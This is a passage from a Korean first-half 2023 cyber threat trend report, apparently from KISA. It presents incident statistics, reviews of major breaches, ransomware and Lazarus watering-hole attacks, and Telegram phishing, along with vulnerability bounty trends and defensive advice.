2023년 상반기 사이버 위협 동향 보고서

2023년 상반기
사이버
위협 동향
보고서
2023년 상반기
사이버
위협 동향
보고서
Part. 1 Trend
사이버 해사고 현황 04
1-1. 침
위협 동향 싱사이트 위협 동향 10
1-2. 피
안 취약점 및 신고포상제 동향 13
1-3. 보
요 공격 기법의 변화 16
1-4. 주
Part. 2 Insights
전문가 2-1. 쿠팡 Blueteam 곽성현 Staff Security Engineer :

컬럼 맞춤형 공격 대응을 위한 기업 내 보안조직 운영 방안 22
2-2. 한국랜섬웨어침해대응센터 이경호 과장 :
랜섬웨어 공격 구조와 취약점 패치의 중요성 32
2-3. 고려대학교 SW보안연구소 최윤성 교수 :
3CX 연쇄 소프트웨어 공급망 공격 사건과 시사점 43
2-4. 한국전자통신연구원 사이버보안연구본부 김익균 :
사이버 억지력 강화를 위한 「Defend Forward」 전략의 이해 55
Part. 3 Techniques
기술 3-1. K
ISA 침해사고분석단 종합분석팀 _ 김동욱 선임, 이태우 선임, 이슬기 선임 :
보고서 TTPs $ ScarCruft Tracking Note 68
3-2. K
ISA 침해사고분석단 사고분석팀 _ 신우성 선임,
플레인비트 _ 이예나 선임, 이상아 연구원, 한택승 연구원 :
블랙캣 랜섬웨어 침해사고 기술보고서 82
2023년 상반기
사이버 위협 동향
보고서
Part. 1
Trend┃ 2023 상반기

1-1. 침
해사고 현황
1-2. 피
싱사이트 위협 동향
1-3. 보
안취약점 및 신고포상제 동향
1-4. 주
요 공격 기법의 변화
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
Part. 1
1-1 침해사고 현황
침해사고 신고 통계
과학기술정보통신부(한국인터넷진흥원)은 「정보통신망 이용촉진 및 정보보호 등에 관한 법률」제48조의 3(침해사고

신고 등)에 따라 민간분야의 정보통신서비스 제공자로부터 침해사고 신고를 받고 있다. 2022년 침해사고 신고
통계를 살펴보면 2021년 640건에서 2022년 1,142건으로 전년대비 약 2배가 증가하였으며, 2023년 상반기
침해사고 신고 건수는 664건으로 전년 상반기 대비 40% 증가하였다. 2021년부터 2023년까지 반기별 침해사고
신고 현황을 살펴보면 2021년 상반기 298건/ 하반기 342건, 2022년 상반기 473건/ 하반기 669건이며, 2023년
상반기엔 664건의 침해사고 신고가 있었다.
[단위 : 건수]
연도 2021년 2022년 2023년

구분 상반기 하반기 상반기 하반기 상반기
건수 298 342 473 669 664
합계 640 1,142 664
표 1-1 침해사고 신고 현황
4
유형별 침해사고 신고 통계
SK쉴더스에서 발표한 2023 상반기 보안 트렌드 보고서의 유형별 침해사고 발생 통계를 살펴보면 정보유출 30%,
악성코드 28%, 피싱/스캠 18%로 나타났다. 과학기술정보통신부(한국인터넷진흥원)의 경우에는 국내 민간분야의
침해사고 신고를 받고 있으며, 2023 상반기 기준으로 DDoS 공격 18.7%, 악성코드 23.5%, 서버 해킹 48.2%로
신고되었다.
2022년 유형별 침해사고 신고 통계를 살펴보면 서버해킹이 전년대비 3.5배로 급격히 증가하였으며, 전체 유형별
비중도 51.2%로 가장 높았다. 그 다음으로 악성코드 감염이 30.4%, DDoS 공격이 10.7%, 기타 7.7%로 나타났다.
2023년 상반기 유형별 침해사고 건수는 DDoS공격이 124건으로 전년 상반기 대비 2.5배로 가장 많이 증가하였으며,
2022년부터 2023년까지 반기별 침해사고 신고 현황을 살펴보면 서버해킹이 2022년 상반기 275건/ 하반기 310건,
2023년 상반기 320건으로 가장 많은 신고를 받은 것으로 나타났다. 그 다음으로는 악성코드 감염 신고가 2022년
상반기 125건/ 하반기 222건, 2023년 상반기 156건으로 많았으며, 다음으로 DDoS 공격 신고가 2022년 상반기
48건/ 하반기 74건, 2023년 상반기 124건 이었다. 유형별 침해사고 기타 분류에는 정보유출, 스팸 문자 및 메일
발송 등의 침해사고 신고 건이 포함되어 있으며, 2022년 상반기 25건/ 하반기 63건, 2023년 상반기에는 64건의
신고를 받은 것으로 나타났다.
[단위 : 건수]
연도 2022 2022 2023

구분 (상반기) 비율 (하반기) 비율 (상반기) 비율
DDoS 공격 48 10.1% 74 11.1% 124 18.7%
악성코드 125 26.4% 222 33.2% 156 23.5%
침해사고
(랜섬웨어) (118) (24.9%) (207) (30.9%) (134) (20.2%)
신고
서버 해킹 275 58.1% 310 46.3% 320 48.2%
기타 25 5.3% 63 9.4% 64 9.6%
합계 473 669 664
표 1-2 유형별 침해사고 신고 현황
5
침해사고 신고 유형 중 악성코드 감염 통계를 살펴보면 악성코드 감염 90% 이상의 비중을 랜섬웨어 신고가
차지하고 있었으며, 2022년 랜섬웨어 신고는 325건으로 지난 4년간 8.3배로 급속히 증가하였다. 2023년 상반기
랜섬웨어 침해사고 현황을 살펴보면 전년 상반기 대비 14% 증가한 134건인 것으로 나타났으며, 중견기업이
전년대비 3배 증가한 17건, 중소기업도 12% 증가한 110건인 것으로 나타났다.
랜섬웨어 침해사고 신고 기관(업)의 백업 여부 현황을 살펴보면 전체 백업률은 2022년 상반기 44.1%/ 하반기
40.1%, 2023년 상반기 47%이지만 그 중 2022년 상반기 23.1%/ 하반기 20.5%, 2023년 상반기 42.9%가 백업까지
감염된 것으로 파악되었다.
업종별 침해사고 신고 통계
2022년 업종별 침해사고 신고 통계를 살펴보면 정보통신업이 409건으로 전년대비 79% 증가 하였으며, 제조업이
245건으로 전년대비 55% 증가하여 가장 많은 사고가 발생한 것으로 나타났다. 또한 도매 및 소매업이 156건으로
전년대비 66% 증가하였고, 협회 및 단체 등 또한 70건으로 전년대비 160% 증가한 것으로 그 뒤를 이었다.
2023년 상반기 업종별 침해사고 신고 통계현황을 살펴보면 제조업이 130건으로 전년 상반기 대비 62.5%로 가장
많이 증가한 것으로 나타났으며, 정보통신업에서 가장 많은 침해사고 신고를 받은 것으로 나타났다. 2022년부터
2023년까지 반기별 침해사고 신고 현황을 살펴보면 정보통신업에서 2022년 상반기 201건/ 하반기 208건, 2023년
상반기 250건으로 가장 많은 신고를 받은 것으로 나타났으며, 제조업이 2022년 상반기 80건/ 하반기 165건,
2023년 상반기 130건으로 그 다음으로 많았다. 도매 및 소매업이 2022년 상반기 60건/ 하반기 96건, 2023년
상반기 95건이었으며, 협회 및 단체 등이 2022년 상반기 30건/ 하반기 40건, 2023년 상반기 39건인 것으로
나타났다.
[단위 : 건수]
연도 2022 2022 2023

구분 (상반기) 비율 (하반기) 비율 (상반기) 비율
정보통신업 201 42.5% 208 31.1% 250 37.7%
제조업 80 16.9% 165 24.7% 130 19.6%
도매 및 소매업 60 12.7% 96 14.4% 95 14.3%
협회 및 단체, 수리 및 기타 개인 서비스업 30 6.3% 40 5.9% 39 5.9%
기타 102 21.6% 160 23.9% 150 22.6%
합계 473 669 664
표 1-3 업종별 침해사고 신고 현황
6
월별 주요사고 리뷰
보안정비 제조사
공급망공격
가상통화거래소 온라인 서점 (6월)
가상자산유출 전자책 유출
(4월) (5월)
랜섬웨어 22 21 31 16 21 23
신고건수
1월 2월 3월 4월 5월 6월
샤오치잉 금융보안모듈
홈페이지 변조 취약점 악용
(1~2월) (6월)
통신사 통신사 거래 플랫폼 금융보안모듈 의약 제조사 의약 제조사
개인정보유출 라우터 대상 개인정보유출 취약점 악용 내부자료유출 개인정보유출
(1월) 디도스(1~2월) (2월) (3월) (4월) (6월)
2023년 1월 1일, 미상의 해커가 해킹포럼에 이동통신사의 고객정보 약 2천 만 건을 6 비트코인에 판매하겠다는

게시글을 올리면서 보안 업계는 연 초 부터 스포트라이트를 받게 되었다. 과기정통부는 이 사건을 중대 침해사고로
판단해 특별조사점검단을 운영하였으며, 개인정보위, 해당 이동통신사와 함께 약 30만 명의 고객정보가 유출된 것을
확인하였다.
정보 유출시점으로 추정되는 `18년 당시의 시스템 및 DB 접속에 대한 로그정보가 거의 남아있지 않아 시나리오

기반의 검증이 진행되었다. 당시 고객인증 DB 시스템은 웹관리자 계정 암호가 시스템 초기암호로 설정되어 있었고,
시스템에 웹취약점이 있어 해당 관리자 계정으로 악성코드를 설치할 수 있었으며, 관리자의 DB 접근제어 등
인증체계가 미흡하여 공격자가 웹셸을 이용하여 파일을 유출해 나갈 수 있었을 것으로 추정되었다. 이번 침해사고
분석과정에서 해당 이동통신사의 자동화된 실시간 감시·통제 시스템의 부재와 미흡한 로그 관리 정책의 문제가
드러나 시정조치를 요구하였다.
1월 샤오치잉1) 해커조직은 대한민국을 겨냥하는 도발적인 메시지와 함께 해킹을 예고했다. 2월까지 이어진
공격으로 연구소, 학회 웹사이트 등의 메인 홈페이지가 변경되고 텔레그램에서 개인정보를 유포하는 등의 피해를
입혔다. 샤오치잉 조직은 국내 웹사이트를 대상으로 취약점 스캔을 수행해서 공격 대상들을 선별했던 것으로
확인된다. 특히 인터넷에서 쉽게 확보할 수 있는 해킹 툴인 Sqlmap과 Nuclei등을 사용했다. 피해 웹사이트들은
대부분 별다른 보안조치 없이 구축·운영되고 있는 편이었다. SQL Injection 공격을 통해 DB에 저장되어 있는
웹 관리자 계정정보가 탈취되었거나, 개발환경과 웹서버 동기화를 위해 계정정보를 담고 있는 파일(sftp.json)이
관리자의 실수로 인해 웹서버에 업로드 되어 있어 공격자가 이를 찾아 접속한 경우도 있었다. 다른 피해기업
3곳은 오래된 버전의 WebLogic(Oracle에서 배포하는 WAS)을 이용 중이었다. 설치된 버전은 공개된 지 10년 이상
지났으며 보안업데이트를 적용한 적이 없는 것으로 확인되었다.
1) 샤오치잉 : 한자로 새벽의 기병대라는 뜻
7
1월 29일과 2월4일에는 이동통신사의 유선 인터넷망, IPTV 등이 5회의 DDoS 공격으로 인해 약 120분간 서비스
불가나 지연이 발생했다. 공격자는 포트 스캔을 통해 통신사의 라우터 장비를 특정하고, 노출된 포트를 대상으로
공격을 시도하여 대규모 장애를 유발했다. 해당 이동통신사는 타 통신사보다 주요 네트워크 정보(장비IP, 포트 등)가
외부에 많이 노출되어 있어서 이를 악용한 공격이 가능했다. 그리고 각 구간에 침입 탐지·차단 보안장비(IPS 등)이
부재하여 비정상 유해 패킷이 유입되었다.
3월과 6월에는 보안 솔루션의 보안패치가 없는(제로데이) 새로운 취약점 공격기법을 통한 국가배후 해킹조직의
공격이 발표되었다. 공격에 악용된 프로그램들은 인터넷뱅킹과 공동인증서 활용 시 본인인증을 위해 사용되기
때문에 국내외의 많은 PC에 설치되어 있었다. 공격자는 피해기관을 타게팅 해 언론사를 통한 워터링홀 공격2)으로
국가·공공기관 및 방산, 기업 등 국내외 주요기관 수십여 곳의 PC를 해킹한 것으로 알려졌다. 해당 취약점들은
3월에 보안패치가 개발되어 배포되었으므로 보호나라를 참고하여 필수적으로 업데이트를 설치해야 한다.
랜섬웨어 공격은 상시 발생하지만 3월에 상대적으로 많은 피해가 있었다. 특히 여러 지역에 공장이 분산되어 있어
관리가 어렵고, 자동화를 위한 시스템은 많지만 전문 보안인력 및 장비가 부족한 제조업체의 피해가 컸다. 침해사고
분석 결과에서도 공격자가 기업 네트워크에 침투하면 백업 시스템을 최우선으로 찾아 파괴하는 것을 확인할 수
있었다. 이는 피해기업과의 협상력을 높이기 위한 공격자의 전략이라고 할 수 있겠다. 이에 대응하기 위해서는
백업을 별도의 네트워크에서 운영하거나 중요 자료는 오프라인 백업을 진행해야 한다. 그리고 최근의 공격은 파일의
암호화 뿐 아니라 내부 파일들을 외부로 유출하였다가 다크웹에서 판매하거나 공개하겠다고 협박하여 이중으로
피해를 입히는 형태를 보이고 있다.
이와 유사한 흐름으로 기업의 정보유출형 공격도 변화하고 있다. 이전에는 기업의 정보를 유출 후 은밀하게
판매하거나 다른 목적(정치적, 산업기밀 탈취, 추가 공격 등)으로 악용하는 형태의 공격이 주였다면, 최근에는 탈취한
정보를 SNS에 공개하는 과시형이나 금전을 요구하는 협박형 공격이 잇따르고 있다. 이런 방식은 기업 기밀 유출로
인한 경쟁력 상실 뿐 아니라 피해 사실이 공표되어 기업 평판 및 신뢰도가 하락하는 심각한 피해를 줄 수 있다.
4월에는 가상자산거래소가 해킹 당하여 약 204억 규모의 자산이 유출되어 크게 이슈가 되었다. 거래소에 대한
보안강화 활동 및 가상자산의 가치 하락 이후 한동안 잠잠하던 거래소 대상 대규모 공격이었다. 피해기업은
고객들의 투자금에 대해 전액 보상을 발표했지만, 가상자산은 익명성 때문에 범죄자들에게 매력적인 먹잇감이기에
향후에도 투자자 보호를 위한 보안 강화에 만전을 기해야겠다.
상반기에는 불특정 다수를 대상으로 하는 피싱 공격도 지속되었다. 간편 로그인이 보편화되면서 보안이 허술한
중소규모의 사이트를 해킹한 후 포털사의 간편 로그인 페이지와 유사한 피싱 페이지를 삽입해 둔다. 방문자가 의심
없이 포털사의 계정을 입력하면 이 값이 그대로 공격자에게 전송된다. 탈취된 계정정보는 해커의 다음 공격을 위한
‘비밀번호 사전(dictionary)’으로 축적되거나 다크웹에서 팔리게 된다. 특히 여러 사이트에서 동일한 비밀번호를
사용하고 있는 사용자라면 크리덴셜 스터핑3) 공격으로 추가 피해가 발생할 수 있다.
2) 공격 대상이 방문할 것으로 추정되는 특정 웹사이트를 해킹 후 취약점 공격 코드를 삽입하고 피해자의 접속을 기다리는 기법. 취약한
버전의 프로그램이 설치된 사용자가 접속 시 악성코드에 감염됨
3) 공격자가 여러 방법으로 기존에 획득한 계정 정보를 이용하여 다른 사이트에 로그인을 시도하는 공격
8
실제로 올해 초부터 크리덴셜 스터핑으로 인한 금전 피해가 지속적으로 신고 되고 있다. 이를 방지하기 위해 사용자

계정에 환금성 자산을 보유하는 사이트에 대해서는 로그인 시 2차 인증 등의 추가 수단 마련을 권장하고 있다.
하지만 최초에 정보가 유출된 곳을 알기 어렵고, 공격대상이 된 사이트에서는 정상 사용자의 로그인과 공격을
구별하기 어렵기 때문에 사용자 자신의 비밀번호 관리가 가장 중요하다. 또한 회사 업무용 계정과 개인용 계정의 ID/
비밀번호를 동일하게 사용할 경우는 기업 내부망 침투의 빌미로 이어질 수 있기 때문에 각별한 주의가 요구된다.
포털사 사칭 이외에도 중소형 쇼핑몰을 해킹한 후 결제 단계에 정상 신용카드 결제 페이지와 비슷한 피싱 페이지를
삽입하여 신용카드 정보를 탈취하는 유형도 계속 신고 되고 있다. 사용자는 실제 구매 과정의 일부로 느낄 수 있기
때문에 금전 피해가 발생하기 쉽다.
6월에는 국내 굴지의 보안장비 회사의 업데이트 서버를 통한 공급망 공격이 확인되어 충격을 주었다. 실제로 공급망
공격은 경계보안이 철저한 기업의 내부를 침투하기 위한 수단으로 사용되어 왔다. 특히 보안장비의 경우는 기업
보안담당자들이 이를 신뢰하고 별도의 주의를 기울이지 않는 경향도 있어 악용될 경우 피해가 클 수 있다. 이 사례를
통해 보안장비를 포함한 기업 내 연결된 모든 시스템들에 대해 ‘제로트러스트’ 모델을 도입하여, 내부 네트워크에서
횡이동(Lateral movement)을 차단하고 시스템 간의 연결을 감시하여 피해를 최소화해야 할 필요성이 강하게
제기되었다.
9
Part. 1
1-2 피싱사이트 위협 동향
텔레그램 사칭 피싱사이트 위협 현황
텔레그램(Telegram)은 보안에 중점을 둔 메신저 앱으로, 스마트폰, 컴퓨터, 태블릿 등 모든 기기에서 간편하게
사용할 수 있고, 작년 데이터센터 화재로 인한 국내 메신저의 장애 이후 사용자수도 급증한 것으로 나타났다. 한편,
스마트폰과 메시지 앱이 편리함을 제공하는 동시에 신분증명 용도와 클라우드 연동 등 여러 기능을 통합하면서
해커들의 모바일 해킹 위협도 강력해지고 있다.
그림 2-1 텔레그램 피싱 공격 및 계정 탈취 흐름도
국내에서는 주로 포털사이트 계정을 탈취하기 위한 피싱공격이 발생하고 있으나 `23년 7월 초부터 국내 텔레그램
사용자 계정을 노린 피싱 공격도 다수 탐지되고 있다. 최근 텔레그램 피싱공격은 1차 계정 탈취 후 등록된 연락처의
지인들에게 ‘계정 재인증 필요’, ‘최신버전 업그레이드’와 같은 메시지를 추가 발송하여 지인을 대상으로 2차 계정
탈취 공격까지 수행한다. 특히, 텔레그램 로그인 피싱사이트는 육안으로 판단할 수 없을 만큼 구별이 어렵다.
10
그림 2-2 텔레그램 로그인 피싱사이트
만약 사용자가 피싱사이트에 속아 전화번호를 입력하면 해커는 악성 스크립트를 실행하여 수 초 내에 새로운

장치에서 공식 텔레그램 웹서버(Telegram Web)에 가로챈 계정으로 로그인 인증을 시도한다. 만약 텔레그램의 2단계
인증(2-Factor Authentication)이 비활성화된 상태라면 해커가 사용자의 계정에 로그인하기 위해 필요한 것은 오직
전화번호와 인증코드 뿐이다. 해커가 Telegram Web 로그인을 통해 세션을 탈취하고 나면 기존 대화내용, 연락처
등을 포함하여 텔레그램 계정을 사실상 완전히 장악할 수 있다.
텔레그램 사칭 사이트(URL) 텔레그램 로그인 피싱사이트 전화번호 입력 시

접속 유도 전화번호 입력 요구 인증코드 가로채기 시도
훔친 전화번호, 인증코드로 해커가 다른 기기에서 접속하여 대화목록, 채팅, 연락처 등

웹버전 텔레그램에 로그인 텔레그램 세션 연결을 활성화 사용자 민감정보 유출 및 제어
그림 2-3 텔레그램 피싱사이트를 이용한 단계별 공격 수법
11
텔레그램 사칭 피싱사이트 분석 결과
해당 텔레그램 피싱사이트를 상세분석한 결과 인증키, 초대코드, 전화번호, 토큰 등 Telegram Web 로그인에

필요한 계정정보를 수집한다. 공격자의 서버에는 1차 공격으로 탈취한 계정과 연락처 목록을 수집하고, 2차 계정
탈취를 위해 메시지를 발송하는 자동화된 피싱 도구가 존재하는 것으로 추정된다. 현재는 오픈소스에 공개된
소스코드를 기반으로 단순 로그인 피싱사이트를 제작하고 있으나 향후 사용자 몰래 웹브라우저 정보를 빼내는 세션
가로채기(session hijacking) 기법 등 보다 정교한 공격으로 진화할 것으로 예상된다.
그림 2-4 텔레그램 피싱사이트에서 계정 정보를 유출하는 악성 스크립트
이와 같이 안드로이드 및 아이폰 기기와 상관없이 모바일 해킹에 당할 수 있기 때문에 사용자는 기본적으로 개인용
컴퓨터와 스마트폰 보안을 강화하기 위해 메신저 앱 접속 시 2차 인증설정(텔레그램 → 일반설정 → 개인 정보 및
보안), 지인이 보낸 메시지라도 출처가 불분명한 사이트 접속은 자제하는 주의가 필요하다. 만일, 피싱 메시지를
수신했다면 절대로 접속하거나 사용자 정보를 입력해서는 안 된다.
그림 2-5 텔레그램 2단계 인증 설정방법
12
Part. 1
보안 취약점 및
1-3 신고포상제 동향
`23년 보안취약점 신고포상제 상반기 현황 분석
< ’22上, ’23.上 취약점 신고건수 > < ’23.上 어플리케이션 종류별 신고비율>
그림 3-1 취약점 신고 포상 관련 통계
`22~`23년 상반기까지 보안취약점 신고포상제에서 신고된 취약점 중 포상된 건수를 기준으로 통계를 산출하였다.
취약점 대상별로 작년과 올해를 비교분석한 결과 Application 취약점이 2배 이상 증가하고 상대적으로 IoT 취약점이
감소했음을 알 수 있다.
Application 내 분류를 하면 ‘보안 프로그램’ 비율이 작년대비 증가(작년 45% → 올해 54%) 하고 다른 분야 대비

가장 높다. 분석 수요가 IoT에서 Application, 즉 보안 프로그램에 집중되고 있다.
13
보안 프로그램 분야에는 백신 이외에 주로 문서보안 솔루션(문서 DRM, Digital Rights Management)에서 취약점이
발견되었다. 팬데믹 이후에도 재택/원격근무가 활성화되면서 대부분 기업에서 문서보안 솔루션을 필수로 사용한다.
그에 따라 분석 수요가 집중되는 반면 취약점 발굴 난이도를 봤을 때 보안성은 상대적으로 떨어지는 편이다.
이에 사용자들도 보안 솔루션을 사용하면 안전하다고만 생각하기보다는 보안 업데이트를 상시하고 제조사에서도

최근 버그바운티를 통해 취약점이 많이 발견되고 있는 만큼 신속한 패치를 통해 사고 예방을 해야 한다.
다음으로 공격유형의 전반적인 변화의 흐름을 살펴보기 위해 최근 3년간과 그 이전 데이터를 비교하였다. 이전과
달리 SQL Injection 취약점이 증가하였고 취약한 인증 및 세션관리, 부적절한 권한 검증 취약점 유형이 상위로 올라간
것을 확인할 수 있다.
< `18년~`20년 3년간 공격 유형별 통계 > < `20년~`23년 상반기 공격 유형별 통계 >
IoT 제품의 경우 상대적으로 작년대비 감소(78건→48건)하였다. 이전 대비 보안 내재화가 됨에 따라 분석 수요가

바뀌고 있는 추세로 보이나 IoT CCTV 등에서 영상 프로토콜(RTSP, ONVIF 등) 관련 부분은 지속적으로 신고되고
있다. 이는 편의성을 제공하기 위한 프로토콜로 특정 URL 접근 시 CCTV 영상 확인 등을 할 수 있는 기능이나 사용자
인증 없이 누구나 접근할 수 있는 결함 사례이다. 이에 상대적으로 취약한 인증 및 세션관리 취약점 유형이 증가함을
확인할 수 있다.
마지막으로 SQL Injection 공격 유형에 해당하는 취약점 대상 중에서 CMS(웹빌더 소프트웨어)가 80% 이상을
차지하고 있다. 또한 최근 3년 동안 CMS 제조사가 다양화(5개→13개)됐다. 대표적인 CMS(그누보드 등)에서 보안
패치를 업데이트하기 전 초기 코드를 커스터마이징하여 판매하거나 보안성을 고려하지 않은 CMS가 다양하게
신고되면서 증가하고 있음을 확인했다. CMS의 경우 주로 웹쇼핑몰에 자주 사용되므로 이에 대한 각별한 주의가
필요함을 시사한다.
14
국내 침해사고 주요 취약점 사례
1월 초 독일 보안전문가 블라디미르 팔란트(Wladimir Palant)는 한국 금융 프로그램이 필요이상으로 많은 것을

수집하고 암호화가 제대로 되어있지 않은 부분이 있음을 지적하며 R社, I社, W社등 총 3개 기업의 금융 보안
프로그램 3종의 19개 취약점을 개인 블로그에 공개 했다.(1.9일, 1.25일, 2.6일, 3.6일) 해당 취약점들은 주로
구버전의 RSA 암호화 방식, OpenlSSL 등으로 인해 일부 기능 오동작 및 PC정보 일부가 노출이 될 수 있는 다소
파급도가 낮은 취약점이었으나 국내 금융권에서 대다수 사용하고 있어 2월 이내에 패치됐다.
3월 초 북한 해킹그룹 라자루스의 해킹 할동에 악용된 것으로 추정되는 취약점이 확인되었다. I社 등 보안

인증프로그램에서 발생한 취약점으로, 인증 우회, 메모리 검증 미흡 등으로 원격코드 실행이 가능하였으며 취약점의
위험도가 매우 높은 것(CVSS 9점대)으로 판별되었다. 특히, 특정 OS 호환성을 위해 삭제되지 않고 남아있는 모듈이
타켓이 되어 공격에 활용되었음을 확인했다. 이외에도 API 사용 시 사용자 인증 부분이 미흡하여 발생하는 침해사고
등이 발생했다.
국외에서는 3월, MS는 CVE-2023-23397 아웃룩 취약점 패치를 공개했으며 메일을 열지 않아도 감염되는
취약점임을 알렸다. 해당 취약점은 사용자가 아웃룩만 실행시켜도 취약한 알람 기능을 통해 사용자의 계정
정보를 노출할 수 있는 취약점으로 CVSS 9.8점을 받았다. CERT-UA(Computer Emergency Response Team
for Ukraine)에서는 러시아 APT28 해킹 그룹이 2022년 4월부터 12월까지 우크라이나, 터키 등을 대상으로 해당
취약점을 악용하여 피싱 이메일(‘윈도우 업데이트 안내’ 등으로 위장)을 유포하였다고 밝혔다.
또한 6월, CISA(Cybersecurity and Infrastructure Security Agency)에서는 클롭(Cl0p) 랜섬웨어 해킹그룹이

Progress社 기업용 파일 전송 프로그램인 MOVEit 취약점(SQL Injection취약점, CVE-2023-34362)을 이용했다고
밝혔다. 이에 피해기업이 300여개로 추정되며, BBC, 영국항공, 지멘스(Siemens), UCLA 대학 등이 해킹 피해자로
밝혀졌다.
상반기 국내외 침해사고에 악용됐던 취약점을 살펴보면 불특정 다수 국민들이 사용하는 금융보안 프로그램, 이메일
프로그램 등이 주로 타겟이 되었으며, 이전에 사용하고 현재 사용하고 있지 않은 모듈 또는 다른 OS 호환성을 위해
남겨둔 모듈, 오래된 오픈소스 사용, API 사용자 인증 부분이 주로 미흡하여 사고가 발생했음을 알 수 있다. 이를
예방하기 위해서는 무엇보다 각 기업의 제품, 서버에서 사용하는 각각의 모듈 정보 및 버전을 현행화하여 관리해야 한다.
15
Part. 1
1-4 주요 공격 기법의 변화
해킹 사고가 지속 발생함에 따라 보안 요구 사항은 점점 더 까다로워지고 있으며 방어 시스템의 기능은 매우 높은

수준으로 발전하고 있다. 그렇지만, 과거의 침해사고들이 현재에도 여전히 발생하고 있으며, 방어 체계를 잘 갖춘
기업도 전혀 예외가 아니다. 한국인터넷진흥원에서는 민간기업에서 발생한 침해사고의 원인 파악과 재발 방지를
위해 분석을 지원하고 대응하고 있다.
Active Directory 환경을 악용한 악성코드 내부 전파 기법 왕성
Newly Tracked Malware Families by Category, 2022
29% Backdoor
34%
Downloader
Dropper
Ransomware
Launcher
5% Other
7%
14%
11%
그림 4-1 ‘22년 유형별 신종 악성코드 발견 통계 (Mandiant, M-Trend 2023)
16
맨디언트 보고서에 따르면, 2022년 신종 악성코드 계열 588개를 추적한 결과 백도어(34%), 다운로더(14%),

드롭퍼(11%), 랜섬웨어(7%), 런처(5%) 등 순으로 발견되었다. 악성코드 종류는 수년 동안 변함없이 유지됐고
백도어의 비중은 새로 추적된 악성코드 계열에서도 3분의 1을 넘었다.
2022년에 발생한 주요 침해사고를 되돌아보면 다기능 백도어를 통한 정보 유출과 랜섬웨어 사고를 뽑을 수 있다.
정보유출 사고는 개인 PC가 감염되면, 공격 대상뿐 아니라 공격 대상의 주변인 정보까지 유출 될 수 있으며, 이
정보를 바탕으로 피해자를 사칭해 주변인에게까지 악성 메일을 발송하는 등 추가적인 피해를 야기할 수 있다.
또한, 귀신 랜섬웨어의 등장은 기존과 달리 피해 기업의 비즈니스 이해도가 월등히 높고, 국내에서 널리 이용되고
있는 솔루션의 활용이 능숙한 차별성이 존재한다. 또한, 국내 수사기관을 열거하는 행위와 국내에서 사용하는
인증제도(ISMS-P)를 언급하는 등 공격자는 한국 보안시장에 대해 지식을 보유하고 있다.
이러한 수많은 침해사고를 장시간 분석하다 보면 공격자들이 선호하는 기법들이 자연스레 보이기 마련이다. 그 중
국내에서 발생한 주요 침해사고에서 공통으로 사용되는 핵심 기법은 ‘SMB/Admin Share’를 이용한 내부 전파(Lateral
Movement)이다. Windows의 SMB/Admin Share 기능은 많은 기업에서 서버 간 자료 공유의 편의성을 추구하거나,
Active Directory 환경에서의 정책 배포를 위해 사용하는 기능이다. 하지만 이 기능을 잘못 사용하였을 경우 보안상
큰 문제가 발생할 수 있다. 대부분의 침해사고 대응은 랜섬웨어 감염으로 파일이 암호화되거나, 정보가 유출되어
해커로부터 협박을 당하는 등 Impact 단계에서 침해사고를 인지한 후 비로소 시작된다. 하지만, 방어자가 침해
사실을 인지할 수 없도록 공격자가 감염 상태만 지속 유지한다면, 공격자는 오랫동안 기업 내부에 잠복할 수 있으며,
내부 정보를 지속적으로 탈취할 수도 있다.
17
보안 소프트웨어 제로데이 취약점을 악용한 공격 기법으로의 변화
올해에도 북한의 해킹그룹이 다양한 사이버 공격을 이어가고 있다고 해도 과언이 아니다. 이들은 정부기관, 방산
업체, 금융기관 등 주요 인프라나 기업을 대상으로 일주일에 한 번 꼴로 공격을 감행하고 있다. 주요 목적은 정보
탈취나 외화벌이 이고 공격 기법은 주로 피싱이다. 북한 입장에서는 피싱 공격으로 해도 충분히 성과를 거두고
있는데 공격 기법을 바꿀 필요가 없다.
그림 4-2 공격 활동이 가장 많이 보고된 북한 해킹 조직 (레코디드퓨처, 북한의 사이버 전략 2023.06)
레코디드 퓨처 연구팀인 ‘인식트 그룹(Insikt Group)’이 2023년 6월에 ‘북한의 사이버 전략’ 보고서를 발표했다.
이 보고서는 2009년 7월부터 2023년 5월 사이 북한 연계 해킹 조직의 소행으로 정부와 관련 업체 등에 의해
공개적으로 지목된 사이버 공격 273건을 분석한 결과가 담겨있다. 지금까지 공격 활동이 가장 많이 보고된 북한
해킹 조직은 ‘김수키’로 전체의 37%를 차지하고, 이어 ‘라자루스’, ‘APT37’ 등이 뒤를 이었다고 말한다. 또한, 북한의
일상적인 사이버 활동은 정부의 의사 결정이나 국가안보 관련 군사 지원하는 정보 수집 등 전통적인 첩보 활동에
더욱 집중하는 경향이 있다고 분석했다. 북한 해킹 조직 가운데 가장 활발한 활동을 보이는 ‘김수키’는 아시아
특히 한국에서 주로 정부와 비정부 기구를 대상으로 사이버 공격을 벌이고, ‘라자루스’는 다양한 표적을 대상으로
활동하지만 암호화폐와 기존 금융기관에 다소 집중하는 것으로 분석했다.
2023년 상반기에는 라자루스 그룹이 제로데이 취약점을 이용하여 공격을 시도하는 정황이 새롭게 확인됐다. 해당
공격그룹은 국내 대다수의 기업과 사용자들이 사용하고 있는 보안 솔루션 및 언론 사이트를 최초 침투에 악용했다.
공격자는 주로 언론사의 기사 페이지에 악성 스크립트를 삽입해 워터링홀 페이지로 악용했으며, 해당 페이지에 접속 시
보안 소프트웨어 취약점을 통해 악성코드를 설치하는 전략을 사용했다. 이 과정에서 공격자는 보안 솔루션 개발업체의
소스코드를 탈취하여 취약점 코드를 개발한 것으로 드러났다. 공격자는 워터링홀 공격을 위해 언론사 사이트를
이용하고, 명령제어지 구축을 위해 호스팅 업체를 악용하는 등 국내 인프라를 이용한 공격 범위 확장을 지속하고 있다.
18
그림 4-3 과거 탈취한 소스코드 악용을 통한 소프트웨어 개발사 공격 (KISA, TTP#10 Operation GoldGoblin)
라자루스 그룹은 보안 소프트웨어 개발사의 소스코드를 탈취한 전적이 있으며, 해당 보안 소프트웨어의 제로데이
취약점을 악용한 공격이 이번 오퍼레이션으로 드러났다. 공격자는 탈취한 소스코드를 분석하여 취약점을 공격하는
코드를 제작하고 연이어 다른 개발사를 공격하는 등 추가적인 공격도구를 준비하는 모습을 보인다.
그림 4-4 최초 침투된 언론사 홈페이지에서 출발한 연이은 홈페이지 감염 (KISA, TTP#10 Operation GoldGoblin)
취약점을 악용하는 워터링홀 공격에는 특정 언론사 홈페이지가 악용되었다. 일반적으로 언론사들은 타 언론사의
단독 보도 확인 등을 위하여 홈페이지를 모니터링하기도 한다. 따라서, 하나의 언론사가 감염되었을 경우
